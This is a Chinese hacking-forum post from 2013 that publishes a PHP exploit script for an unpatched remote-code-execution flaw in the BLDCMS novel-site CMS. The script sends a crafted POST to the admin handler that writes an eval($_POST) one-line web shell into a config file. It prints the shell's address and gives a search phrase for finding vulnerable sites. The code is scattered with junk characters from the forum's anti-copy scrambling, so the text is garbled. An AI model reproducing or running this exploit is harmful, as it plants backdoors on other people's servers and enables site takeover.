找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2216|回复: 0
打印 上一主题 下一主题

BLDCMS(白老大小说) Getshell 0day EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-26 20:49:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
2 ^2 G( x  l& x5 Q- k- S/ ~# S& Q' j/ h: I: i* {$ V0 h* w

7 G/ B' A3 }# [9 \话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了   r' `8 G2 h* o& P# q

, f, [& B5 d( Q- O既然都有人发了 我就把我之前写好的EXP放出来吧) W$ {. i- ^4 Y
9 p9 h* R% K$ M- U
view source print?01.php;">% D6 J% C. F0 J9 O' w1 D5 ^; u# K
02.<!--?php  P' P' K) S( C" Y7 i) Z, x
03.echo "-------------------------------------------------------------------/ y3 Q( |5 ?) b+ `5 m) N
04. 5 N, s; I5 v* n; h3 U
05.------------\r\n              BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
$ k. X/ @! t5 Y+ o& W9 J1 j06.   x6 g8 G' A6 u, v0 k1 b9 a. Y
07.(GPC=Off)\r\n            Vulnerability discovery&Code by 数据流@wooyun
+ V0 @  b/ ?: ^! Z# t$ O08.
4 `% L7 @6 @4 q3 p# D09.QQ:981009941\r\n                                2013.3.21\r\n            
& [' l5 r) D& F! h1 z10. 0 k% i$ M4 l. U5 P: F
11. & C$ v3 o- ]" {- t) k- b
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
$ ?4 O  D- G3 ?9 b13. , c, y/ `3 m8 Z
14.)\r\n                    搜索关键字:\"开发者: 白老大小说\"\r\n-----------0 W3 `% A6 f/ T2 w
15.
" U! g' w2 C1 M$ [3 L16.--------------------------------------------------------------------\r\n";8 i$ a3 M; f' k" j& s7 h% b
17.$url=$argv[1];& L% u, l+ _6 N5 G& w# j
18.$dir=$argv[2];
+ t2 o2 N' E% I' y$ U8 {19.$pass=$argv[3];
! ?2 o) ?2 `/ {  ]20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
; o2 t5 Y) V7 [3 H6 k; B21.if (emptyempty($pass)||emptyempty($url))9 ^. \( V( K) n7 f! ]/ P
22.{exit("请输入参数");}
4 G, }' t, w& l" _: O8 j23.else5 M3 X! z, _5 `4 u4 l
24.{; x# S. J! B$ b7 }* w# x: f0 T2 B, }
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev  B" c: |/ |2 F' w( B
26.
2 K+ Q. e! v" B6 `- J/ U6 r5 |& D6 G27.al;
+ |; l  q% M6 V; `28.$length = strlen($fuckdata);- T4 j2 p, W  i% J% F' u/ _
29.function getshell($url,$pass)' }' B- V/ W1 K# r, p
30.{
$ Y* {6 x& F! r31.global $url,$dir,$pass,$eval,$length,$fuckdata;
" T. b( f4 [3 r: r3 F32.$header = "OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
/ ^* l; z3 q( m& s& s33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";! a1 u7 n) ?+ j4 U4 A4 W7 U4 p. o
34.$header .= "User-Agent: MSIE\r\n";
7 @9 O9 j  [/ ]0 |35.$header .= "Host:".$url."\r\n";5 o1 X5 W' b) U5 `- q. B8 ^
36.$header .= "Content-Length: ".$length."\r\n";
2 c/ [& i! ?, T  ?9 Q. d+ u' F% ~& A9 r37.$header .= "Connection: Close\r\n";
$ _$ A4 Q, {7 j2 v* x38.$header .="\r\n";; \( D% g" |* ]7 d& J
39.$header .= $fuckdata."\r\n\r\n";
, T) X: [' j& Z( r40.$fp = fsockopen($url, 80,$errno,$errstr,15);! @6 D* ?0 ^7 \; C
41.if (!$fp)  t' V- g8 J& p' I
42.{
% w& j2 k4 i% \5 Q7 u0 N9 E43.exit ("利用失败:请检查指定目标是否能正常打开");
+ k: {+ o) {3 L" j1 j44.}9 p7 i9 j; w* y, K
45.else{ if (!fputs($fp,$header))) U3 e9 Q  `5 Y; A1 x; `$ @# Z
46.{exit ("利用失败");}# P+ G9 r" M7 v% v
47.else
/ _& W1 V1 F7 U2 h$ ]48.{
% [! r$ O/ d! e49.$receive = '';
8 j' Q. I* z5 |/ b! H1 P50.while (!feof($fp)) {, b& m  Y& t. P( {
51.$receive .= @fgets($fp, 1000);
! M& h* A) p! }4 W7 Z52.}1 l! D7 N: |8 C  r- D' c
53.@fclose($fp);
, n- W% m  u  C) E# }54.echo "$url/$dir/conn/config/normal2.php passpass(如连接失败 请检查目标8 J: ?0 T+ o9 [" a3 l1 n- ]' _
55. % N% c7 J' B* J% N
56.GPC是否=off)";
7 h" P% y/ l& ?9 x/ C: X4 L) F2 w57.}}1 v' s. G/ `: [* k
58.}
7 R1 W3 o  Y! W. @! g# P2 u" f- b59.}5 K- @- g+ g5 e
60.getshell($url,$pass);
9 Q" e  e0 ~1 m" Z1 q6 Z' C2 z61.?-->& ^' X& U7 `2 J7 U6 \! u- j

: c" B- [* _, U: t4 p* R% h
$ u8 m0 ?1 r: |5 b / z$ g" x5 l+ x( W7 R) ]& E
by 数据流
5 J+ y) l8 M, }1 r, ?
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表